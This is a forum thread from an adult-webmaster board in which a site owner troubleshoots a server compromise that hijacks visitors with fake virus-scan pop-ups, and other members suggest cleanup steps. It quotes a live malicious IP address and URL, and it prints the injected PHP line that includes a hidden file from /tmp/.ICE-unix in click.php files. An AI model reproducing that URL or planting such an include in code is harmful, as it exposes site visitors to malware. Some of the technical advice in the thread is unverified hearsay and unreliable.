Virus/Hack

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • milo99
    Registered User
    • Aug 2010
    • 48

    #1

    Virus/Hack

    Hey guys dealing with a brutal hack/virus. These guys are smart as it only usually happens 1 time per ip. You could easily have this virus and you would never know it. I discovered it by accident. This is happening on my tubes that are using STP and TP it is also happening on one of my TGP's using TGPX and A2 so it is likely Server based. There appears to be nothing out of the ordinary on my Server. We have also locked down the server only providing access from my ip but it is still happening.
    When it loads you can actually see the gallery or tube start to load then it takes over. You get pop ups saying that you computer needs to be scanned for viruses etc. The domain that loads is this one so i am hoping it looks familiar to someone. I shouldn't have to say this but **DO NOT LOAD THIS IN YOUR BROWSER**
    91.226.213.60/1bdeb97e93c47ab826ec1a82c1f427ed63041810d588f02f

    This one has me stumped any help would be appreciated

    Adult Webmasters Save Huge On Scripts & Services
    Buy | Sell | Request Deals | The only site of it's kind for our industry!
    Most of our deals are exclusive you CANNOT get them anywhere else!

    Anytime Guys: ICQ 670033471
  • Juicy D. Links
    So Fucking Banned
    • Apr 2001
    • 122992

    #2
    in case people dont see it


    **DO NOT LOAD THIS IN YOUR BROWSER**

    Comment

    • slizard
      Registered User
      • Jul 2003
      • 39

      #3
      It's not a hack. You probably sell traffic to TH.

      Each time someone goes to see TH's support about it, they don't know what we're talking about. Saying they visited the offended sites and they saw nothing.

      In other words, they act and play stupids cuz they know what is going on and they do jack shit about it cuz probably they have something to win in all that.

      And I'm supposed to believe that they know the difference between a real hit and a bot. LOL

      Comment

      • slizard
        Registered User
        • Jul 2003
        • 39

        #4
        And for those that don't sell any traffic to TH and use free scripts, the skim % to pay for the script goes also to brokers...

        Comment

        • milo99
          Registered User
          • Aug 2010
          • 48

          #5
          no I don't sell traffic and my trade scripts are paid ones so there is no skim there either. Also my tubes and TGP's trade with different sites all together. This is not only happening on trades as I can see my gallery or tube start to load in the background then this thing takes over. One time it happened on a gallery that I made myself so I know it is clean.
          Boy this one is scary!
          Last edited by milo99; 06-17-2011, 09:30 AM.

          Adult Webmasters Save Huge On Scripts & Services
          Buy | Sell | Request Deals | The only site of it's kind for our industry!
          Most of our deals are exclusive you CANNOT get them anywhere else!

          Anytime Guys: ICQ 670033471

          Comment

          • spazlabz
            Confirmed User
            • Jul 2003
            • 6548

            #6
            Originally posted by Juicy D. Links
            in case people dont see it


            **DO NOT LOAD THIS IN YOUR BROWSER**
            I wonder if I should load that in my browser






            Thanks Milo for the heads up

            Comment

            • Harmon
              ( ͡ʘ╭͜ʖ╮͡ʘ)
              • Mar 2004
              • 20012

              #7
              It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

              Thanks for the warning Juice
              [email protected]

              Comment

              • milo99
                Registered User
                • Aug 2010
                • 48

                #8
                Originally posted by Harmon
                It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

                Thanks for the warning Juice
                Easy my friend. This is a 11 year old domain and the TGP and Tube are 100% legal.

                Adult Webmasters Save Huge On Scripts & Services
                Buy | Sell | Request Deals | The only site of it's kind for our industry!
                Most of our deals are exclusive you CANNOT get them anywhere else!

                Anytime Guys: ICQ 670033471

                Comment

                • Chosen
                  • Aug 2001
                  • 63151

                  #9
                  Originally posted by spazlabz
                  I wonder if I should load that in my browser






                  Thanks Milo for the heads up

                  Comment

                  • Chosen
                    • Aug 2001
                    • 63151

                    #10
                    milo99, what browser are you using?

                    Comment

                    • milo99
                      Registered User
                      • Aug 2010
                      • 48

                      #11
                      Originally posted by Chosen
                      milo99, what browser are you using?
                      I am on a Mac using FF however this also happened to the guy who makes my galleries who is on a PC using Chrome

                      Adult Webmasters Save Huge On Scripts & Services
                      Buy | Sell | Request Deals | The only site of it's kind for our industry!
                      Most of our deals are exclusive you CANNOT get them anywhere else!

                      Anytime Guys: ICQ 670033471

                      Comment

                      • AdultKing
                        Raise Your Weapon
                        • Jun 2003
                        • 15601

                        #12
                        It can be really hard to detect changes on a well hacked server, you really need to check everything twice or three times as you move it all to a fresh machine. If it is server based, you could never trust that installation again.

                        I assume you have run all the rootkit checkers etc on the system for clues ?

                        Comment

                        • milo99
                          Registered User
                          • Aug 2010
                          • 48

                          #13
                          Yes my host has been running checks since this started but with no luck. Anyone recommend someone who specializes in this kind of thing?

                          Adult Webmasters Save Huge On Scripts & Services
                          Buy | Sell | Request Deals | The only site of it's kind for our industry!
                          Most of our deals are exclusive you CANNOT get them anywhere else!

                          Anytime Guys: ICQ 670033471

                          Comment

                          • harvey
                            Confirmed User
                            • Jul 2001
                            • 9266

                            #14
                            we cleaned it last week from a client's server but the motherfucker infected my computer and it took me 2 days to clean everything. You probably got it from an image redirect, it's the new trend.

                            Anyway, it's a very tedious task, but look for each and every strange file in your server. Then open your php and html files and look at the bottom, you'll probably find an image src (or depending on the version, some JS). Delete it.

                            Now check your site using Chrome or Safari. DO NOT USE IEXPLOITER (why would anyone? ) and, sad to say, but DO NOT USE FIREFOX 4! It has a bug that allows images to load as exe

                            If it's clean, time to clean your PC. The only antivirus I know of that catches it is ESET NOD, but maybe other antivirus programs have been updated. This is what I did:

                            1) log in safe mode
                            2) run SuperAntispyware
                            3) run ESET NOD (you can run your AV program)
                            4) checked registry and cleaned a couple entries left

                            once you do that and your computer is clean, have your FTP password changed. DO NOT LOGIN TO YOUR SERVER VIA FTP UNTIL YOU DO THIS! Use a very hard to guess key, and if your server allows SFTP, then USE IT!

                            If everything goes fine, your server and PC will be clean and you're safe to go.

                            As a general precaution: do not pay attention to "server techs". 90% of them are morons who can't even turn on a computer, much less know about servers. And the chances of you getting one of the remaining 10% are really slim
                            This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth

                            Comment

                            • milo99
                              Registered User
                              • Aug 2010
                              • 48

                              #15
                              I think we found this nasty thing. All of my click.php files for TGPX had this attached to them...

                              $qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');

                              This was a server hack. Keep em' locked up tight!

                              Adult Webmasters Save Huge On Scripts & Services
                              Buy | Sell | Request Deals | The only site of it's kind for our industry!
                              Most of our deals are exclusive you CANNOT get them anywhere else!

                              Anytime Guys: ICQ 670033471

                              Comment

                              • Horny Guy
                                Confirmed User
                                • Jan 2002
                                • 1677

                                #16
                                check your home router dns settings also and reset the router password ...

                                they get in to your server using your IP at your home also
                                Great hosting and Lots of Ip's

                                Comment

                                • milo99
                                  Registered User
                                  • Aug 2010
                                  • 48

                                  #17
                                  Originally posted by Horny Guy
                                  check your home router dns settings also and reset the router password ...

                                  they get in to your server using your IP at your home also
                                  Thanks Will Do.
                                  Am hoping this was just a permissions thing as the click.php files on other domains that had the correct file permissions appear untouched.

                                  Adult Webmasters Save Huge On Scripts & Services
                                  Buy | Sell | Request Deals | The only site of it's kind for our industry!
                                  Most of our deals are exclusive you CANNOT get them anywhere else!

                                  Anytime Guys: ICQ 670033471

                                  Comment

                                  • V_RocKs
                                    Damn Right I Kiss Ass!
                                    • Nov 2003
                                    • 32449

                                    #18
                                    Hacking is fun

                                    Comment

                                    • r34lg33k
                                      Registered User
                                      • Jan 2005
                                      • 29

                                      #19
                                      need to clear your cookies whichever browser you are using, its a 1 occurence a day / ip payload.
                                      we've recently observed these files in TradePulse's /tp/ installation directory as well, easier to spot with ioncube loading in a non-ioncube app. not likely to come up with search tools, an ioncube encoded payload means scanning it is a bit of a pain. a more permanent solution could be to turn ioncube load off but that's not an option with the fact that you already want to run SmartThumbs/SmartTubes
                                      # icq 2.333.686 - www.CheeChTech.com
                                      # Coding: PhP Perl Java JavaScript Flash SOAP C/C++
                                      # SysAdmin: linux & freebsd

                                      Comment

                                      • seeandsee
                                        Check SIG!
                                        • Mar 2006
                                        • 50945

                                        #20
                                        just 1 way to find out what is going on, pay some expert!
                                        BUY MY SIG - 50$/Year

                                        Contact here

                                        Comment

                                        Working...